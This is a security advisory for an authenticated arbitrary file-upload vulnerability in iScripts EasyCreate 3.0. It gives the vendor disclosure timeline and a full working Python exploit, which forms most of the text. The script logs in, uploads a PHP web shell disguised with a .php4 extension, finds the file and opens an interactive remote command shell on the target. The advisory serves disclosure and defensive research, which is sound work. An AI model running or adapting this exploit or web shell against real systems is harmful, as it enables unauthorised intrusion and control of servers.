iScripts EasyCreate 3.0 Remote Code Execution Exploit

2016-01-28T00:00:00
ID ZSL-2016-5297
Type zeroscience
Reporter Bikramaditya Guha
Modified 2016-01-28T00:00:00

Description

Title: iScripts EasyCreate 3.0 Remote Code Execution Exploit
Advisory ID: ZSL-2016-5297
Type: Local/Remote
Impact: System Access
Risk: (4/5)
Release Date: 28.01.2016

Summary

iScripts EasyCreate is a private label online website builder. This software allows you to start an online business by offering website building services to your customers. Equipped with drag and drop design functionality, crisp templates and social sharing capabilities, this online website builder software will allow you to provide the best website building features to your users.

Description

iScripts EasyCreate suffers from an authenticated arbitrary PHP code execution. The vulnerability is caused due to the improper verification of uploaded files in '/ajax_image_upload.php' script thru the 'userImages' POST parameter. This can be exploited to execute arbitrary PHP code by uploading a malicious PHP script file with '.php4' extension (to bypass the '.htaccess' block rule) that will be stored in '/uploads/siteimages/thumb/' directory.

Vendor

iScripts.com - <http://www.iscripts.com>

Affected Version

3.0

Tested On

Apache
MySQL 5.5.40

Vendor Status

[17.11.2015] First contact to vendor.
[08.12.2015] Follow up with vendor. No response received.
[08.12.2015] Ticket Created using online portal (id #010248399110346).
[08.12.2015] Ticket closed by vendor without requesting vulnerability details.
[28.12.2015] Vendor responds asking more details.
[29.12.2015] Sent details to the vendor.
[05.01.2016] Follow up with vendor. No response received.
[14.01.2016] Follow up with vendor. No response received.
[28.01.2016] Public Security advisory released.

PoC

iscripts_rce.py

Credits

Vulnerability discovered by Bikramaditya Guha - <bik@zeroscience.mk>

References

[1] <https://packetstormsecurity.com/files/135513>
[2] <https://cxsecurity.com/issue/WLB-2016010230>
[3] <https://www.exploit-db.com/exploits/39387/>

Changelog

[28.01.2016] - Initial release
[31.01.2016] - Added reference [1] and [2]
[01.02.2016] - Added reference [3]

Contact

Zero Science Lab

Web: <http://www.zeroscience.mk>
e-mail: lab@zeroscience.mk

                                        
                                            #!C:/Python27/python.exe -u
#
#
# iScripts EasyCreate 3.0 Remote Code Execution Exploit
#
#
# Vendor: iScripts.com
# Product web page: http://www.iscripts.com
# Affected version: 3.0
#
# Summary: iScripts EasyCreate is a private label online website builder. This 
# software allows you to start an online business by offering website building 
# services to your customers. Equipped with drag and drop design functionality, 
# crisp templates and social sharing capabilities, this online website builder 
# software will allow you to provide the best website building features to your 
# users.
#
# Desc: iScripts EasyCreate suffers from an authenticated arbitrary PHP code
# execution. The vulnerability is caused due to the improper verification of 
# uploaded files in '/ajax_image_upload.php' script thru the 'userImages' POST 
# parameter. This can be exploited to execute arbitrary PHP code by uploading 
# a malicious PHP script file with '.php4' extension (to bypass the '.htaccess'
# block rule) that will be stored in '/uploads/siteimages/thumb/' directory.
#
# Tested on: Apache
#			 MySQL 5.5.40
#
# Vulnerability discovered by Bikramaditya 'PhoenixX' Guha
#
# Zero Science Lab - http://www.zeroscience.mk
# Macedonian Information Security Research And Development Laboratory
#
#
# Advisory ID: ZSL-2016-5297
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5297.php
#
#
# 17.11.2015
#
#

version = '3.0'

import itertools, mimetools, mimetypes
import cookielib, urllib, urllib2, sys
import logging, os, time, datetime, re
import requests, httplib

from colorama import Fore, Back, Style, init
from cStringIO import StringIO
from urllib2 import URLError

global file
file = 'abcde2'

init()

if os.name == 'posix': os.system('clear')
if os.name == 'nt': os.system('cls')
piton = os.path.basename(sys.argv[0])

def bannerche():
    print '''
 @-------------------------------------------------------------@
 |    iScripts EasyCreate 3.0 Remote Code Execution Exploit    |
 |                      ID: ZSL-2016-5297                      |
 |             Copyleft (c) 2016, Zero Science Lab             |
 @-------------------------------------------------------------@
          '''
    if len(sys.argv) &lt; 1:
        print '\n\x20\x20[*] '+Fore.YELLOW+'Usage: '+Fore.RESET+piton+' &lt;hostname&gt;\n'
        print '\x20\x20[*] '+Fore.CYAN+'Example: '+Fore.RESET+piton+' zeroscience.mk\n'
        sys.exit()

bannerche()

print '\n\x20\x20[*] Initialising exploit '+'.'*34+Fore.GREEN+'[OK]'+Fore.RESET

host = sys.argv[1]

cj = cookielib.CookieJar()
opener2 = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))

print '\x20\x20[*] Checking host and path '+'.'*32+Fore.GREEN+'[OK]'+Fore.RESET

opener2.open('http://'+host+'/easycreate/demo/login.php')

print '\x20\x20[*] Login please.'

username = raw_input('\x20\x20[*] Enter username: ')
password = raw_input('\x20\x20[*] Enter password: ')

login_data = urllib.urlencode({
                            'vuser_login' : username,
                            'vuser_password' : password,                            
                            })

login = opener2.open('http://'+host+'/easycreate/demo/login.php?act=post', login_data)
auth = login.read()

if re.search(r'Invalid username and', auth):
    print '\x20\x20[*] Incorrect username or password '+'.'*24+Fore.RED+'[ER]'+Fore.RESET
    print
    sys.exit()
else:
    print '\x20\x20[*] Authenticated '+'.'*41+Fore.GREEN+'[OK]'+Fore.RESET
	
response = opener2.open('http://'+host+'/easycreate/demo/usermain.php?succ=msg')
output = response.read()

for session in cj:
    sessid = session.name

print '\x20\x20[*] Mapping session ID '+'.'*36+Fore.GREEN+'[OK]'+Fore.RESET
ses_chk = re.search(r'%s=\w+' % sessid , str(cj))
cookie = ses_chk.group(0)
print '\x20\x20[*] Cookie: '+Fore.YELLOW+cookie+Fore.RESET

class MultiPartForm(object):

    def __init__(self):
        self.form_fields = []
        self.files = []
        self.boundary = mimetools.choose_boundary()
        return
    
    def get_content_type(self):
        return 'multipart/form-data; boundary=%s' % self.boundary

    def add_field(self, name, value):
        self.form_fields.append((name, value))
        return

    def add_file(self, field_name, filename, fileHandle, mimetype=None):
        body = fileHandle.read()
        if mimetype is None:
            mimetype = mimetypes.guess_type(filename)[0] or 'application/octet-stream'
        self.files.append((field_name, filename, mimetype, body))
        return
    
    def __str__(self):

        parts = []
        part_boundary = '--' + self.boundary
        
        parts.extend(
            [ part_boundary,
              'Content-Disposition: form-data; name="%s"; filename="%s"' % \
                 (field_name, filename),
              'Content-Type: application/x-msdownload',
              '',
              body,
            ]
            for field_name, filename, content_type, body in self.files
            )
            
        parts.extend(
            [ part_boundary,
              'Content-Disposition: form-data; name="%s"' % name,
              '',
              value,
            ]
            for name, value in self.form_fields
            )
        
        flattened = list(itertools.chain(*parts))
        flattened.append('--' + self.boundary + '--')
        flattened.append('')
        return '\r\n'.join(flattened)

if __name__ == '__main__':
    
    form = MultiPartForm()
    form.add_file('userImages', 'abcde2.php4', 
                  fileHandle=StringIO('&lt;?php system(\$_GET[\\\'cmd\\\']); ?&gt;'))


    request = urllib2.Request('http://'+host+'/easycreate/demo/ajax_image_upload.php')
    request.add_header('User-agent', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0')
    request.add_header('Referer', 'http://'+host+'/easycreate/demo/gallerymanager.php')
    request.add_header('Accept-Language', 'en-US,en;q=0.5')
    body = str(form)
    request.add_header('Content-type', form.get_content_type())
    request.add_header('Connection', 'keep-alive')
    request.add_header('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8')
    request.add_header('Accept-Encoding', 'gzip, deflate')
    request.add_header('Cookie', cookie)
    request.add_header('Content-length', len(body))
    request.add_data(body)
    request.get_data()
    urllib2.urlopen(request).read()
    print '\x20\x20[*] Sending payload '+'.'*39+Fore.GREEN+'[OK]'+Fore.RESET

response = opener2.open('http://'+host+'/easycreate/demo/gallerymanager.php')
output = response.read()

for line in output.splitlines():
    if file in line:
            filename = str(line.split("=")[2:])[3:84]
            print filename

print Style.DIM+Fore.CYAN+'\x20\x20[*] Press [ ENTER ] to INSERT COIN!\n'+Style.RESET_ALL+Fore.RESET
raw_input()
while True:
    try:
        cmd = raw_input(Fore.RED+'shell@'+host+':~# '+Fore.RESET)
        execute = opener2.open(filename+'cmd='+cmd)
        reverse = execute.read()
        print reverse
        
        if cmd.strip() == 'exit':
            break

    except Exception:
        break

sys.exit()